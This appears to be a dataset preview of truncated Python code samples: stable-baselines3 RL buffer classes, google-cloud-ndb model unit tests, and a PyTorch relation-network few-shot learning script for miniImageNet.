input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
import warnings
from abc import ABC, abstractmethod
from typing import Dict, Generator, Optional, Union
import numpy as np
import torch as th
from gym import spaces
try:
# Check memory used by replay buffer when possible
import psutil
except ImportError:
psutil = None
from stable_baselines3.common.preprocessing import get_action_dim, get_obs_shape
from stable_baselines3.common.type_aliases import ReplayBufferSamples, RolloutBufferSamples
from stable_baselines3.common.vec_env import VecNormalize
class BaseBuffer(ABC):
    """
    Base class that represents a buffer (rollout or replay).

    :param buffer_size: Max number of elements in the buffer
    :param observation_space: Observation space
    :param action_space: Action space
    :param device: PyTorch device to which the sampled values will be converted
    :param n_envs: Number of parallel environments
    """

    def __init__(
        self,
        buffer_size: int,
        observation_space: spaces.Space,
        action_space: spaces.Space,
        device: Union[th.device, str] = "cpu",
        n_envs: int = 1,
    ):
        # Modernized from the Python-2 style ``super(BaseBuffer, self)``
        super().__init__()
        self.buffer_size = buffer_size
        self.observation_space = observation_space
        self.action_space = action_space
        self.obs_shape = get_obs_shape(observation_space)
        self.action_dim = get_action_dim(action_space)
        # ``pos`` is the next write index; ``full`` becomes True once the
        # buffer has wrapped around at least once.
        self.pos = 0
        self.full = False
        self.device = device
        self.n_envs = n_envs

    @staticmethod
    def swap_and_flatten(arr: np.ndarray) -> np.ndarray:
        """
        Swap and then flatten axes 0 (buffer_size) and 1 (n_envs)
        to convert shape from [n_steps, n_envs, ...] (where ... is the shape of the features)
        to [n_steps * n_envs, ...] (which maintains the order).

        :param arr: Array of shape [n_steps, n_envs, ...]
        :return: Array of shape [n_steps * n_envs, ...]
        """
        shape = arr.shape
        if len(shape) < 3:
            # Add a dummy trailing feature axis so the reshape below is uniform
            shape = shape + (1,)
        return arr.swapaxes(0, 1).reshape(shape[0] * shape[1], *shape[2:])

    def size(self) -> int:
        """
        :return: The current number of stored elements
        """
        if self.full:
            return self.buffer_size
        return self.pos

    def add(self, *args, **kwargs) -> None:
        """
        Add elements to the buffer. Must be implemented by subclasses.
        """
        raise NotImplementedError()

    def extend(self, *args, **kwargs) -> None:
        """
        Add a new batch of transitions to the buffer.
        """
        # Do a for loop along the batch axis
        for data in zip(*args):
            self.add(*data)

    def reset(self) -> None:
        """
        Reset the buffer (storage arrays are kept; only the write cursor moves).
        """
        self.pos = 0
        self.full = False

    def sample(self, batch_size: int, env: Optional[VecNormalize] = None):
        """
        Sample ``batch_size`` elements uniformly, with replacement.

        :param batch_size: Number of elements to sample
        :param env: associated gym VecEnv
            to normalize the observations/rewards when sampling
        :return: Samples
        """
        upper_bound = self.buffer_size if self.full else self.pos
        batch_inds = np.random.randint(0, upper_bound, size=batch_size)
        return self._get_samples(batch_inds, env=env)

    @abstractmethod
    def _get_samples(
        self, batch_inds: np.ndarray, env: Optional[VecNormalize] = None
    ) -> Union[ReplayBufferSamples, RolloutBufferSamples]:
        """
        :param batch_inds: Indices of the transitions to gather
        :param env: associated gym VecEnv for normalization
        :return: Samples
        """
        raise NotImplementedError()

    def to_torch(self, array: np.ndarray, copy: bool = True) -> th.Tensor:
        """
        Convert a numpy array to a PyTorch tensor.
        Note: it copies the data by default.

        :param array: Array to convert
        :param copy: Whether to copy or not the data
            (may be useful to avoid changing things by reference)
        :return: Tensor on ``self.device``
        """
        if copy:
            return th.tensor(array).to(self.device)
        return th.as_tensor(array).to(self.device)

    @staticmethod
    def _normalize_obs(
        obs: Union[np.ndarray, Dict[str, np.ndarray]], env: Optional[VecNormalize] = None
    ) -> Union[np.ndarray, Dict[str, np.ndarray]]:
        """Normalize observations with the VecNormalize statistics, if provided."""
        if env is not None:
            return env.normalize_obs(obs)
        return obs

    @staticmethod
    def _normalize_reward(reward: np.ndarray, env: Optional[VecNormalize] = None) -> np.ndarray:
        """Normalize rewards with the VecNormalize statistics, if provided."""
        if env is not None:
            return env.normalize_reward(reward).astype(np.float32)
        return reward
class ReplayBuffer(BaseBuffer):
    """
    Replay buffer used in off-policy algorithms like SAC/TD3.

    :param buffer_size: Max number of element in the buffer
    :param observation_space: Observation space
    :param action_space: Action space
    :param device: PyTorch device to which the sampled values will be converted
    :param n_envs: Number of parallel environments
    :param optimize_memory_usage: Enable a memory efficient variant
        of the replay buffer which reduces by almost a factor two the memory used,
        at a cost of more complexity.
        See https://github.com/DLR-RM/stable-baselines3/issues/37#issuecomment-637501195
        and https://github.com/DLR-RM/stable-baselines3/pull/28#issuecomment-637559274
    """

    def __init__(
        self,
        buffer_size: int,
        observation_space: spaces.Space,
        action_space: spaces.Space,
        device: Union[th.device, str] = "cpu",
        n_envs: int = 1,
        optimize_memory_usage: bool = False,
    ):
        super(ReplayBuffer, self).__init__(buffer_size, observation_space, action_space, device, n_envs=n_envs)
        assert n_envs == 1, "Replay buffer only support single environment for now"
        # Check that the replay buffer can fit into the memory
        if psutil is not None:
            mem_available = psutil.virtual_memory().available
        self.optimize_memory_usage = optimize_memory_usage
        self.observations = np.zeros((self.buffer_size, self.n_envs) + self.obs_shape, dtype=observation_space.dtype)
        if optimize_memory_usage:
            # `observations` contains also the next observation
            # (next_obs of slot i lives in observations[(i + 1) % buffer_size])
            self.next_observations = None
        else:
            self.next_observations = np.zeros((self.buffer_size, self.n_envs) + self.obs_shape, dtype=observation_space.dtype)
        self.actions = np.zeros((self.buffer_size, self.n_envs, self.action_dim), dtype=action_space.dtype)
        self.rewards = np.zeros((self.buffer_size, self.n_envs), dtype=np.float32)
        self.dones = np.zeros((self.buffer_size, self.n_envs), dtype=np.float32)
        if psutil is not None:
            # Warn (do not fail) if the allocated arrays exceed the available RAM
            total_memory_usage = self.observations.nbytes + self.actions.nbytes + self.rewards.nbytes + self.dones.nbytes
            if self.next_observations is not None:
                total_memory_usage += self.next_observations.nbytes
            if total_memory_usage > mem_available:
                # Convert to GB
                total_memory_usage /= 1e9
                mem_available /= 1e9
                warnings.warn(
                    "This system does not have apparently enough memory to store the complete "
                    f"replay buffer {total_memory_usage:.2f}GB > {mem_available:.2f}GB"
                )

    def add(self, obs: np.ndarray, next_obs: np.ndarray, action: np.ndarray, reward: np.ndarray, done: np.ndarray) -> None:
        """Store one transition; the oldest entry is overwritten once the buffer is full."""
        # Copy to avoid modification by reference
        self.observations[self.pos] = np.array(obs).copy()
        if self.optimize_memory_usage:
            # Memory-efficient layout: next_obs goes into the slot that the
            # *next* transition's obs will occupy (circular buffer).
            self.observations[(self.pos + 1) % self.buffer_size] = np.array(next_obs).copy()
        else:
            self.next_observations[self.pos] = np.array(next_obs).copy()
        self.actions[self.pos] = np.array(action).copy()
        self.rewards[self.pos] = np.array(reward).copy()
        self.dones[self.pos] = np.array(done).copy()
        self.pos += 1
        if self.pos == self.buffer_size:
            self.full = True
            self.pos = 0

    def sample(self, batch_size: int, env: Optional[VecNormalize] = None) -> ReplayBufferSamples:
        """
        Sample elements from the replay buffer.
        Custom sampling when using memory efficient variant,
        as we should not sample the element with index `self.pos`
        See https://github.com/DLR-RM/stable-baselines3/pull/28#issuecomment-637559274

        :param batch_size: Number of element to sample
        :param env: associated gym VecEnv
            to normalize the observations/rewards when sampling
        :return: Samples
        """
        if not self.optimize_memory_usage:
            return super().sample(batch_size=batch_size, env=env)
        # Do not sample the element with index `self.pos` as the transitions is invalid
        # (we use only one array to store `obs` and `next_obs`)
        if self.full:
            batch_inds = (np.random.randint(1, self.buffer_size, size=batch_size) + self.pos) % self.buffer_size
        else:
            batch_inds = np.random.randint(0, self.pos, size=batch_size)
        return self._get_samples(batch_inds, env=env)

    def _get_samples(self, batch_inds: np.ndarray, env: Optional[VecNormalize] = None) -> ReplayBufferSamples:
        """Gather (obs, action, next_obs, done, reward) tuples for the given indices."""
        if self.optimize_memory_usage:
            # next_obs of slot i is stored at slot (i + 1) % buffer_size
            next_obs = self._normalize_obs(self.observations[(batch_inds + 1) % self.buffer_size, 0, :], env)
        else:
            next_obs = self._normalize_obs(self.next_observations[batch_inds, 0, :], env)
        data = (
            self._normalize_obs(self.observations[batch_inds, 0, :], env),
            self.actions[batch_inds, 0, :],
            next_obs,
            self.dones[batch_inds],
            self._normalize_reward(self.rewards[batch_inds], env),
        )
        return ReplayBufferSamples(*tuple(map(self.to_torch, data)))
class RolloutBuffer(BaseBuffer):
"""
Rollout buffer used in on-policy algorithms like A2C/PPO.
It corresponds to ``buffer_size`` transitions collected
using the current policy.
This experience will be discarded after the policy update.
In order to use PPO objective, we also store the current value of each state
and the log probability of each taken action.
    The collected data is discarded once it has been used.
The term rollout here refers to the model-free notion and should not
be used with the concept of rollout used in model-based RL or planning.
Hence, it is only involved in policy and value function training but not action selection.
:param buffer_size: Max number of element in the buffer
:param observation_space: Observation space
:param action_space: Action space
:param device:
:param gae_lambda: Factor for trade-off of bias vs variance for Generalized Advantage Estimator
Equivalent to classic advantage when set to 1.
:param gamma: Discount factor
:param n_envs: Number of parallel environments
"""
def __init__(
self,
buffer_size: int,
observation_space: spaces.Space,
action_space: spaces.Space,
device: Union[th.device, str] = "cpu",
gae_lambda: float = 1,
gamma: float = 0.99,
n_envs: int = 1,
):
super(RolloutBuffer, self).__init__(buffer_size, observation_space, action_space, device, n_envs=n_envs)
self.gae_lambda = gae_lambda
self.gamma = gamma
self.observations, self.actions, self.rewards, self.advantages = None, None, None, None
self.returns, self.episode_starts, self.values, self.log_probs = None, None, None, None
self.generator_ready = False
self.reset()
def reset(self) -> None:
self.observations = np.zeros((self.buffer_size, self.n_envs) + self.obs_shape, dtype=np.float32)
self.actions = np.zeros((self.buffer_size, self.n_envs, self.action_dim), dtype=np.float32)
self.rewards = np.zeros((self.buffer_size, self.n_envs), dtype=np.float32)
self.returns = np.zeros((self.buffer_size, self.n_envs), dtype=np.float32)
self.episode_starts = np.zeros((self.buffer_size, self.n_envs), dtype=np.float32)
self.values = np.zeros((self.buffer_size, self.n_envs), dtype=np.float32)
self.log_probs = np.zeros((self.buffer_size, self.n_envs), dtype=np.float32)
self.advantages = np.zeros((self.buffer_size, self.n_envs), dtype=np.float32)
self.generator_ready = False
super(RolloutBuffer, self).reset()
def compute_returns_and_advantage(self, last_values: th.Tensor, dones: np.ndarray) -> None:
"""
Post-processing step: compute the lambda-return (TD(lambda) estimate)
and GAE(lambda) advantage.
Uses Generalized Advantage Estimation (https://arxiv.org/abs/1506.02438)
to compute the advantage. To obtain vanilla advantage (A(s) = R - V(S))
where R is the discounted reward with value bootstrap,
set ``gae_lambda=1.0`` during initialization.
The TD(lambda) estimator has also two special cases:
- TD(1) is Monte-Carlo estimate (sum of discounted rewards)
- TD(0) is one-step estimate with bootstrapping (r_t + gamma * v(s_{t+1}))
For more information, see discussion in https://github.com/DLR-RM/stable-baselines3/pull/375.
:param last_values: state value estimation for the last step (one for each env)
:param dones: if the last step was a terminal step (one bool for each env).
"""
# Convert to numpy
last_values = last_values.clone().cpu().numpy().flatten()
last_gae_lam = 0
for step in reversed(range(self.buffer_size)):
if step | |
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import pickle
import types
import unittest.mock
import zlib
from google.cloud.datastore import helpers
import pytest
from google.cloud.ndb import _datastore_types
from google.cloud.ndb import exceptions
from google.cloud.ndb import key
from google.cloud.ndb import model
from google.cloud.ndb import query
import tests.unit.utils
def test___all__():
    """``model.__all__`` must list exactly the module's public names."""
    tests.unit.utils.verify___all__(model)
def test_Key():
    """``model.Key`` is a re-export of ``key.Key``."""
    assert model.Key is key.Key
def test_BlobKey():
    """``model.BlobKey`` is a re-export of ``_datastore_types.BlobKey``."""
    assert model.BlobKey is _datastore_types.BlobKey
def test_GeoPt():
    """``model.GeoPt`` is a re-export of ``helpers.GeoPoint``."""
    assert model.GeoPt is helpers.GeoPoint
class TestIndexProperty:
    """Unit tests for ``model.IndexProperty``."""

    @staticmethod
    def test_constructor():
        index_prop = model.IndexProperty(name="a", direction="asc")
        assert index_prop._name == "a"
        assert index_prop._direction == "asc"

    @staticmethod
    def test_name():
        index_prop = model.IndexProperty(name="b", direction="asc")
        assert index_prop.name == "b"

    @staticmethod
    def test_direction():
        index_prop = model.IndexProperty(name="a", direction="desc")
        assert index_prop.direction == "desc"

    @staticmethod
    def test___repr__():
        index_prop = model.IndexProperty(name="c", direction="asc")
        assert repr(index_prop) == "IndexProperty(name='c', direction='asc')"

    @staticmethod
    def test___eq__():
        # ``not ==`` (rather than ``!=``) is used deliberately so that only
        # ``__eq__`` is exercised, not ``__ne__``.
        index_prop1 = model.IndexProperty(name="d", direction="asc")
        index_prop2 = model.IndexProperty(name="d", direction="desc")
        index_prop3 = unittest.mock.sentinel.index_prop
        assert index_prop1 == index_prop1
        assert not index_prop1 == index_prop2
        assert not index_prop1 == index_prop3

    @staticmethod
    def test___ne__():
        index_prop1 = model.IndexProperty(name="d", direction="asc")
        index_prop2 = model.IndexProperty(name="d", direction="desc")
        index_prop3 = unittest.mock.sentinel.index_prop
        assert not index_prop1 != index_prop1
        assert index_prop1 != index_prop2
        assert index_prop1 != index_prop3

    @staticmethod
    def test___hash__():
        # Equal values must hash equal even across distinct instances.
        index_prop1 = model.IndexProperty(name="zip", direction="asc")
        index_prop2 = model.IndexProperty(name="zip", direction="asc")
        assert index_prop1 is not index_prop2
        assert hash(index_prop1) == hash(index_prop2)
        assert hash(index_prop1) == hash(("zip", "asc"))
class TestIndex:
    """Unit tests for ``model.Index``."""

    @staticmethod
    def test_constructor():
        index_prop = model.IndexProperty(name="a", direction="asc")
        index = model.Index(
            kind="IndK", properties=(index_prop,), ancestor=False
        )
        assert index._kind == "IndK"
        assert index._properties == (index_prop,)
        assert not index._ancestor

    @staticmethod
    def test_kind():
        index = model.Index(kind="OK", properties=(), ancestor=False)
        assert index.kind == "OK"

    @staticmethod
    def test_properties():
        index_prop1 = model.IndexProperty(name="a", direction="asc")
        index_prop2 = model.IndexProperty(name="b", direction="desc")
        index = model.Index(
            kind="F", properties=(index_prop1, index_prop2), ancestor=False
        )
        assert index.properties == (index_prop1, index_prop2)

    @staticmethod
    def test_ancestor():
        index = model.Index(kind="LK", properties=(), ancestor=True)
        assert index.ancestor

    @staticmethod
    def test___repr__():
        index_prop = model.IndexProperty(name="a", direction="asc")
        index = model.Index(
            kind="IndK", properties=[index_prop], ancestor=False
        )
        expected = "Index(kind='IndK', properties=[{!r}], ancestor=False)"
        expected = expected.format(index_prop)
        assert repr(index) == expected

    @staticmethod
    def test___eq__():
        # ``not ==`` (rather than ``!=``) keeps the test focused on __eq__;
        # each of index2-4 differs from index1 in exactly one field.
        index_props = (model.IndexProperty(name="a", direction="asc"),)
        index1 = model.Index(kind="d", properties=index_props, ancestor=False)
        index2 = model.Index(kind="d", properties=(), ancestor=False)
        index3 = model.Index(kind="d", properties=index_props, ancestor=True)
        index4 = model.Index(kind="e", properties=index_props, ancestor=False)
        index5 = unittest.mock.sentinel.index
        assert index1 == index1
        assert not index1 == index2
        assert not index1 == index3
        assert not index1 == index4
        assert not index1 == index5

    @staticmethod
    def test___ne__():
        index_props = (model.IndexProperty(name="a", direction="asc"),)
        index1 = model.Index(kind="d", properties=index_props, ancestor=False)
        index2 = model.Index(kind="d", properties=(), ancestor=False)
        index3 = model.Index(kind="d", properties=index_props, ancestor=True)
        index4 = model.Index(kind="e", properties=index_props, ancestor=False)
        index5 = unittest.mock.sentinel.index
        assert not index1 != index1
        assert index1 != index2
        assert index1 != index3
        assert index1 != index4
        assert index1 != index5

    @staticmethod
    def test___hash__():
        # Equal values hash equal across distinct instances.
        index_props = (model.IndexProperty(name="a", direction="asc"),)
        index1 = model.Index(kind="d", properties=index_props, ancestor=False)
        index2 = model.Index(kind="d", properties=index_props, ancestor=False)
        assert index1 is not index2
        assert hash(index1) == hash(index2)
        assert hash(index1) == hash(("d", index_props, False))
class TestIndexState:
    """Unit tests for ``model.IndexState``."""

    # Shared sentinel standing in for an Index definition.
    INDEX = unittest.mock.sentinel.index

    def test_constructor(self):
        index_state = model.IndexState(
            definition=self.INDEX, state="error", id=42
        )
        assert index_state._definition is self.INDEX
        assert index_state._state == "error"
        assert index_state._id == 42

    def test_definition(self):
        index_state = model.IndexState(
            definition=self.INDEX, state="serving", id=1
        )
        assert index_state.definition is self.INDEX

    @staticmethod
    def test_state():
        index_state = model.IndexState(definition=None, state="deleting", id=1)
        assert index_state.state == "deleting"

    @staticmethod
    def test_id():
        index_state = model.IndexState(definition=None, state="error", id=1001)
        assert index_state.id == 1001

    @staticmethod
    def test___repr__():
        # repr must recurse into the nested Index definition.
        index_prop = model.IndexProperty(name="a", direction="asc")
        index = model.Index(
            kind="IndK", properties=[index_prop], ancestor=False
        )
        index_state = model.IndexState(
            definition=index, state="building", id=1337
        )
        expected = (
            "IndexState(definition=Index(kind='IndK', properties=["
            "IndexProperty(name='a', direction='asc')], ancestor=False), "
            "state='building', id=1337)"
        )
        assert repr(index_state) == expected

    def test___eq__(self):
        # ``not ==`` (rather than ``!=``) keeps the test focused on __eq__;
        # each of index_state2-4 differs from index_state1 in exactly one field.
        index_state1 = model.IndexState(
            definition=self.INDEX, state="error", id=20
        )
        index_state2 = model.IndexState(
            definition=unittest.mock.sentinel.not_index, state="error", id=20
        )
        index_state3 = model.IndexState(
            definition=self.INDEX, state="serving", id=20
        )
        index_state4 = model.IndexState(
            definition=self.INDEX, state="error", id=80
        )
        index_state5 = unittest.mock.sentinel.index_state
        assert index_state1 == index_state1
        assert not index_state1 == index_state2
        assert not index_state1 == index_state3
        assert not index_state1 == index_state4
        assert not index_state1 == index_state5

    def test___ne__(self):
        index_state1 = model.IndexState(
            definition=self.INDEX, state="error", id=20
        )
        index_state2 = model.IndexState(
            definition=unittest.mock.sentinel.not_index, state="error", id=20
        )
        index_state3 = model.IndexState(
            definition=self.INDEX, state="serving", id=20
        )
        index_state4 = model.IndexState(
            definition=self.INDEX, state="error", id=80
        )
        index_state5 = unittest.mock.sentinel.index_state
        assert not index_state1 != index_state1
        assert index_state1 != index_state2
        assert index_state1 != index_state3
        assert index_state1 != index_state4
        assert index_state1 != index_state5

    def test___hash__(self):
        # Equal values hash equal across distinct instances.
        index_state1 = model.IndexState(
            definition=self.INDEX, state="error", id=88
        )
        index_state2 = model.IndexState(
            definition=self.INDEX, state="error", id=88
        )
        assert index_state1 is not index_state2
        assert hash(index_state1) == hash(index_state2)
        assert hash(index_state1) == hash((self.INDEX, "error", 88))
class TestModelAdapter:
    """``model.ModelAdapter`` must refuse construction."""

    @staticmethod
    def test_constructor():
        with pytest.raises(NotImplementedError):
            model.ModelAdapter()
def test_make_connection():
    """``model.make_connection`` always raises NotImplementedError."""
    with pytest.raises(NotImplementedError):
        model.make_connection()
class TestModelAttribute:
    """Unit tests for ``model.ModelAttribute``."""

    @staticmethod
    def test_constructor():
        attr = model.ModelAttribute()
        assert isinstance(attr, model.ModelAttribute)

    @staticmethod
    def test__fix_up():
        # The base-class hook returns None.
        attr = model.ModelAttribute()
        assert attr._fix_up(model.Model, "birthdate") is None
class Test_BaseValue:
    """Unit tests for the ``model._BaseValue`` wrapper."""

    @staticmethod
    def test_constructor():
        wrapped = model._BaseValue(17)
        assert wrapped.b_val == 17

    @staticmethod
    def test_constructor_invalid_input():
        # None and lists are rejected by the constructor.
        with pytest.raises(TypeError):
            model._BaseValue(None)
        with pytest.raises(TypeError):
            model._BaseValue([1, 2])

    @staticmethod
    def test___repr__():
        wrapped = model._BaseValue(b"abc")
        assert repr(wrapped) == "_BaseValue(b'abc')"

    @staticmethod
    def test___eq__():
        # ``not ==`` (rather than ``!=``) keeps the test focused on __eq__.
        wrapped1 = model._BaseValue("one val")
        wrapped2 = model._BaseValue(25.5)
        wrapped3 = unittest.mock.sentinel.base_value
        assert wrapped1 == wrapped1
        assert not wrapped1 == wrapped2
        assert not wrapped1 == wrapped3

    @staticmethod
    def test___ne__():
        wrapped1 = model._BaseValue("one val")
        wrapped2 = model._BaseValue(25.5)
        wrapped3 = unittest.mock.sentinel.base_value
        assert not wrapped1 != wrapped1
        assert wrapped1 != wrapped2
        assert wrapped1 != wrapped3

    @staticmethod
    def test___hash__():
        # hash() is expected to raise TypeError on a _BaseValue.
        wrapped = model._BaseValue((11, 12, 88))
        with pytest.raises(TypeError):
            hash(wrapped)
class TestProperty:
    @staticmethod
    def test_constructor_defaults():
        prop = model.Property()
        # Check that none of the constructor defaults were used.
        assert prop.__dict__ == {}

    @staticmethod
    def _example_validator(prop, value):
        # Sample validator shared by the constructor/repr tests below.
        return value.lower()

    def test__example_validator(self):
        # The sample validator must be idempotent.
        value = "AbCde"
        validated = self._example_validator(None, value)
        assert validated == "abcde"
        assert self._example_validator(None, validated) == "abcde"

    def test_constructor_explicit(self):
        """Every constructor argument lands in the matching ``_``-prefixed attribute."""
        prop = model.Property(
            name="val",
            indexed=False,
            repeated=False,
            required=True,
            default="zorp",
            choices=("zorp", "zap", "zip"),
            validator=self._example_validator,
            verbose_name="VALUE FOR READING",
            write_empty_list=False,
        )
        assert prop._name == "val"
        assert not prop._indexed
        assert not prop._repeated
        assert prop._required
        assert prop._default == "zorp"
        # ``choices`` is normalized to a frozenset.
        assert prop._choices == frozenset(("zorp", "zap", "zip"))
        assert prop._validator is self._example_validator
        assert prop._verbose_name == "VALUE FOR READING"
        assert not prop._write_empty_list
    @staticmethod
    def test_constructor_invalid_name():
        # Non-string names raise TypeError; dotted names raise ValueError.
        with pytest.raises(TypeError):
            model.Property(name=["not", "a", "string"])
        with pytest.raises(ValueError):
            model.Property(name="has.a.dot")

    @staticmethod
    def test_constructor_repeated_not_allowed():
        # ``repeated`` cannot be combined with ``required`` or ``default``.
        with pytest.raises(ValueError):
            model.Property(name="a", repeated=True, required=True)
        with pytest.raises(ValueError):
            model.Property(name="b", repeated=True, default="zim")

    @staticmethod
    def test_constructor_invalid_choices():
        # A dict is not an acceptable ``choices`` container.
        with pytest.raises(TypeError):
            model.Property(name="a", choices={"wrong": "container"})

    @staticmethod
    def test_constructor_invalid_validator():
        # Non-callable validators are rejected.
        with pytest.raises(TypeError):
            model.Property(
                name="a", validator=unittest.mock.sentinel.validator
            )
    def test_repr(self):
        # Only values that differ from the defaults appear in repr
        # (``repeated=False`` and ``write_empty_list=False`` are omitted).
        prop = model.Property(
            "val",
            indexed=False,
            repeated=False,
            required=True,
            default="zorp",
            choices=("zorp", "zap", "zip"),
            validator=self._example_validator,
            verbose_name="VALUE FOR READING",
            write_empty_list=False,
        )
        expected = (
            "Property('val', indexed=False, required=True, "
            "default='zorp', choices={}, validator={}, "
            "verbose_name='VALUE FOR READING')".format(
                prop._choices, prop._validator
            )
        )
        assert repr(prop) == expected

    @staticmethod
    def test_repr_subclass():
        # Subclass attributes that differ from the class defaults show up in repr.
        class SimpleProperty(model.Property):
            _foo_type = None
            _bar = "eleventy"

            def __init__(self, *, foo_type, bar):
                self._foo_type = foo_type
                self._bar = bar

        prop = SimpleProperty(foo_type=list, bar="nope")
        assert repr(prop) == "SimpleProperty(foo_type=list, bar='nope')"

    @staticmethod
    def test__datastore_type():
        # The base Property passes values through unchanged.
        prop = model.Property("foo")
        value = unittest.mock.sentinel.value
        assert prop._datastore_type(value) is value
    @staticmethod
    def test__comparison_indexed():
        # Comparisons on unindexed properties must be rejected.
        prop = model.Property("color", indexed=False)
        with pytest.raises(exceptions.BadFilterError):
            prop._comparison("!=", "red")

    @staticmethod
    def test__comparison(property_clean_cache):
        prop = model.Property("sentiment", indexed=True)
        filter_node = prop._comparison(">=", 0.0)
        assert filter_node == query.FilterNode("sentiment", ">=", 0.0)

    @staticmethod
    def test__comparison_empty_value():
        prop = model.Property("height", indexed=True)
        filter_node = prop._comparison("=", None)
        assert filter_node == query.FilterNode("height", "=", None)
        # Cache is untouched.
        assert model.Property._FIND_METHODS_CACHE == {}
    @staticmethod
    def test___eq__(property_clean_cache):
        # ``prop == value`` builds a FilterNode; the reflected form must match too.
        prop = model.Property("name", indexed=True)
        value = 1337
        expected = query.FilterNode("name", "=", value)
        filter_node_left = prop == value
        assert filter_node_left == expected
        filter_node_right = value == prop
        assert filter_node_right == expected

    @staticmethod
    def test___ne__(property_clean_cache):
        # ``!=`` expands to an OR of ``<`` and ``>``.
        prop = model.Property("name", indexed=True)
        value = 7.0
        expected = query.DisjunctionNode(
            query.FilterNode("name", "<", value),
            query.FilterNode("name", ">", value),
        )
        or_node_left = prop != value
        assert or_node_left == expected
        or_node_right = value != prop
        assert or_node_right == expected

    @staticmethod
    def test___lt__(property_clean_cache):
        prop = model.Property("name", indexed=True)
        value = 2.0
        expected = query.FilterNode("name", "<", value)
        filter_node_left = prop < value
        assert filter_node_left == expected
        filter_node_right = value > prop
        assert filter_node_right == expected

    @staticmethod
    def test___le__(property_clean_cache):
        prop = model.Property("name", indexed=True)
        value = 20.0
        expected = query.FilterNode("name", "<=", value)
        filter_node_left = prop <= value
        assert filter_node_left == expected
        filter_node_right = value >= prop
        assert filter_node_right == expected
@staticmethod
def test___gt__(property_clean_cache):
prop = model.Property("name", indexed=True)
| |
= torch.relu(self.fc1(out))
out = torch.sigmoid(self.fc2(out))
return out, {"x": x, "out1": out1, "out2": out2} if is_summary else None
pass
class CNNEncoderMy4(nn.Module):
    """Four-layer convolutional encoder; later layers use increasing dilation and no padding."""

    def __init__(self):
        super().__init__()

        def conv_block(in_ch, out_ch, dilation=1, pool=False):
            # Conv3x3 (no padding) -> BatchNorm -> ReLU, optionally followed by 2x2 max-pool.
            modules = [
                nn.Conv2d(in_ch, out_ch, kernel_size=3, padding=0, dilation=dilation),
                nn.BatchNorm2d(out_ch, momentum=1, affine=True),
                nn.ReLU(),
            ]
            if pool:
                modules.append(nn.MaxPool2d(2))
            return nn.Sequential(*modules)

        # Attribute names (and Sequential sub-module order) are kept so that
        # state_dict keys stay identical to the original implementation.
        self.layer1 = conv_block(3, 16, pool=True)
        self.layer2 = conv_block(16, 16, dilation=1)
        self.layer3 = conv_block(16, 32, dilation=2)
        self.layer4 = conv_block(32, 32, dilation=3)

    def forward(self, x, is_summary=False):
        """Return the final feature map and, when requested, every intermediate activation."""
        out1 = self.layer1(x)
        out2 = self.layer2(out1)
        out3 = self.layer3(out2)
        out4 = self.layer4(out3)
        summary = {"x": x, "out1": out1, "out2": out2, "out3": out3, "out4": out4} if is_summary else None
        return out4, summary
class RelationNetworkMy4(nn.Module):
    """Relation head: three conv blocks followed by a two-layer MLP emitting a score in (0, 1)."""

    def __init__(self):
        super().__init__()
        # Sub-module order inside each Sequential matches the original,
        # so state_dict keys are unchanged.
        self.layer1 = nn.Sequential(
            nn.Conv2d(64, 32, kernel_size=3, padding=1),
            nn.BatchNorm2d(32, momentum=1, affine=True),
            nn.ReLU(),
            nn.MaxPool2d(2),
        )
        self.layer2 = nn.Sequential(
            nn.Conv2d(32, 32, kernel_size=3, padding=1),
            nn.BatchNorm2d(32, momentum=1, affine=True),
            nn.ReLU(),
            nn.MaxPool2d(2),
        )
        self.layer3 = nn.Sequential(
            nn.Conv2d(32, 32, kernel_size=3, padding=1),
            nn.BatchNorm2d(32, momentum=1, affine=True),
            nn.ReLU(),
            # Fixed 4x4 output so the flattened size is input-size independent.
            nn.AdaptiveAvgPool2d(4),
        )
        self.fc1 = nn.Linear(32 * 4 * 4, 32)
        self.fc2 = nn.Linear(32, 1)

    def forward(self, x, is_summary=False):
        """Return the per-pair relation score and, when requested, intermediate activations."""
        out1 = self.layer1(x)
        out2 = self.layer2(out1)
        out3 = self.layer3(out2)
        flat = out3.view(out3.size(0), -1)
        hidden = torch.relu(self.fc1(flat))
        score = torch.sigmoid(self.fc2(hidden))
        # NOTE: mirrors the original — the summary intentionally omits out3.
        summary = {"x": x, "out1": out1, "out2": out2} if is_summary else None
        return score, summary
##############################################################################################################
class Runner(object):
    def __init__(self, model_name, feature_encoder, relation_network, compare_fsl_fn, train_episode=300000,
                 data_root='/mnt/4T/Data/miniImagenet', summary_dir=None, is_load_data=False):
        """
        Few-shot learning training/evaluation driver.

        :param model_name: tag used in the checkpoint file names
        :param feature_encoder: embedding network (initialized and moved to CUDA here)
        :param relation_network: relation head (initialized and moved to CUDA here)
        :param compare_fsl_fn: one of the ``compare_fsl_*`` methods used to score episodes
        :param train_episode: total number of training episodes
        :param data_root: miniImageNet root directory
        :param summary_dir: TensorBoard log directory; summaries are enabled when not None
        :param is_load_data: whether to pre-load all split data up front
        """
        # Episode layout: 5-way, 1 support sample and 15 query samples per class.
        self.class_num = 5
        self.sample_num_per_class = 1
        self.batch_num_per_class = 15
        self.train_episode = train_episode  # 500000
        self.val_episode = 600
        self.test_avg_num = 10
        self.test_episode = 600
        self.learning_rate = 0.001
        self.print_freq = 1000
        self.val_freq = 5000  # 5000
        self.best_accuracy = 0.0
        self.model_name = model_name
        self.feature_encoder = feature_encoder
        self.relation_network = relation_network
        self.compare_fsl_fn = compare_fsl_fn
        # Checkpoint paths for the two networks.
        self.feature_encoder_dir = Tools.new_dir("../models/{}_feature_encoder_{}way_{}shot.pkl".format(
            self.model_name, self.class_num, self.sample_num_per_class))
        self.relation_network_dir = Tools.new_dir("../models/{}_relation_network_{}way_{}shot.pkl".format(
            self.model_name, self.class_num, self.sample_num_per_class))
        # data
        self.folders_train, self.folders_val, self.folders_test = MiniImageNet.folders(data_root)
        self.data_dict = MiniImageNet.load_data(self.folders_train, self.folders_val,
                                                self.folders_test) if is_load_data else None
        # model: custom weight init, move to GPU, Adam with step-decayed LR (halved every third of training)
        self.feature_encoder.apply(self._weights_init).cuda()
